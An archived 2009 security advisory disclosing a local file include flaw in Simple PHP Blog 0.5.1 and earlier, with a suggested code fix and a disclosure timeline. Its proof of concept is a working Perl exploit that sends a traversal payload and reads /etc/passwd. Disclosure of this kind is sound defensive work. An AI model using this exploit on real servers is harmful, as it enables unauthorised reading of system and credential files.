lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Fri, 18 Dec 2009 13:14:03 +0100
From: ISecAuditors Security Advisories <advisories@...cauditors.com>
To: bugs@...uritytracker.com, news@...uriteam.com,
	full-disclosure@...ts.grok.org.uk, vuln@...unia.com,
	packet@...ketstormsecurity.org, bugtraq@...urityfocus.com
Subject: [ISecAuditors Security Advisories] Simple PHP Blog <= 0.5.1 Local
 File Include vulnerability

=============================================
INTERNET SECURITY AUDITORS ALERT 2009-005
- Original release date: March 2nd, 2009
- Last revised:  December 18th, 2009
- Discovered by: Juan Galiana Lara
- Severity: 6.8/10 (CVSS scored)
=============================================

I. VULNERABILITY
-------------------------
Simple PHP Blog <= 0.5.1 Local File Include vulnerability

II. BACKGROUND
-------------------------
Simple PHP Blog is a blog system does not requires database setup, and
is very easy to install.

III. DESCRIPTION
-------------------------
Simple PHP Blog <= 0.5.1 is affected by a Local File Include
vulnerability in 'languages_cgi.php' due to parameter 'blog_language1'
is not properly sanitized.

IV. PROOF OF CONCEPT
-------------------------
The affected code:

62     require_once('languages/' . $_POST[ 'blog_language1' ] .
'/strings.php');

Exploit:

#!/usr/bin/perl
# Local File Include Exploit
# Simple PHP Blog <= 0.5.1
# jgaliana <at> isecauditors=dot=com
# Internet Security Auditors

use LWP::UserAgent;

if ($#ARGV < 3) { die("Usage: $0 <site> <path> <file> <cookie>"); }
$ua = LWP::UserAgent->new;
$ua->agent("Simple PHP Blog Exploit ^_^");
$ua->default_header('Cookie' => "sid=$ARGV[3]");
my $req = new HTTP::Request POST =>
"http://$ARGV[0]$ARGV[1]/languages_cgi.php";
$req->content_type('application/x-www-form-urlencoded');
$req->content("blog_language1=../../../../..$ARGV[2]%00");
my $res = $ua->request($req);

if ($res->is_success) {
    print $res->content;
} else {
    print "Error: " .$res->status_line, "\n";
}

$ perl simple.pl example.com /blog /etc/passwd <my_cookie_here>|head -1
root:*:0:0:root:/root:/bin/bash

The bug can be exploited with or without 'magic_quotes_gpc', but note
that if magic_quotes_gpc is set to Off, an attacker can view any file,
adding a '\0' character like /etc/passwd, if not only can include php
files, allowing to execute any local php files.

V. BUSINESS IMPACT
-------------------------
The impact is the attacker can read arbitrary files in the context of
the webserver and execute arbitrary local php scripts.

VI. SYSTEMS AFFECTED
-------------------------
Versions prior and including 0.5.1 are affected
In order to patch the application the function file_exists() and
basename() must be added to the affected code.

VII. SOLUTION
-------------------------
Change line 62 of languages_cgi.php in order to filter $_POST[
'blog_language1' ] variable.

if (ereg('^[a-zA-Z0-9_]+$', $_POST[ 'blog_language1' ]))
require_once('languages/' . $_POST[ 'blog_language1' ] . '/strings.php');

VIII. REFERENCES
-------------------------
http://www.simplephpblog.com
http://sourceforge.net/projects/sphpblog/
http://www.isecauditors.com

IX. CREDITS
-------------------------
This vulnerability has been discovered and reported
by Juan Galiana Lara (jgaliana (at) isecauditors (dot) com).

X. REVISION HISTORY
-------------------------
March   02, 2009: Initial release.
December  18, 2009: Last revision.

XI. DISCLOSURE TIMELINE
-------------------------
March     02, 2009: Vulnerability acquired by
                    Internet Security Auditors (www.isecauditors.com)
March     03, 2009: Notified to developer. No response.
December  13, 2009: Notified again. No response.
December  18, 2009: Added mitigation solution and sent to lists.

XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Internet Security Auditors accepts no responsibility for any damage
caused by the use or misuse of this information.

Powered by blists - more mailing lists